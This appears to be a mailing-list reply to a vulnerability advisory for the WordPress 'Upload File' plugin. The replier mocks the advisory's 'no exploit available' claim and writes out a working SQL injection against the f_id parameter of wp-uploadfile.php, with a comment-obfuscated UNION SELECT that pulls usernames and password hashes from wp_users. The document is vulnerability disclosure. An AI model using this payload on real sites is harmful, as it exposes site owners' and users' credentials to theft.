Re: vuln in WordPress plugin Upload File(UP)
--------------------Summary----------------
Software: Upload File (WordPress Plugin)
Critical Level: Moderate
Type: SQL Injection
Class: Remote
Status: Unpatched
PoC/Exploit: Not Available ---> *
Solution: Not Available
Discovered by: eserg.ru
-----------------Description---------------
1. SQL Injection.
http://localhost/[path]/wp-uploadfile.php?f_id=[SQL]
---> no exploit
SQL query:
null/**/union/**/all/**/select/**/concat(user_login,0x3a,user_pass)/**/f
rom/**/wp_users/*
--> exploit.
--------------PoC/Exploit----------------------
Waiting for developer(s) reply.
--> 1)haha ...
--> 2)so what you're going to make an exploit for a simple GET request ?
--------------Solution---------------------
--> read this
http://www.hsc.fr/ressources/normalisation/saf/draft-debeaupuis-saf-00.txt
Regards.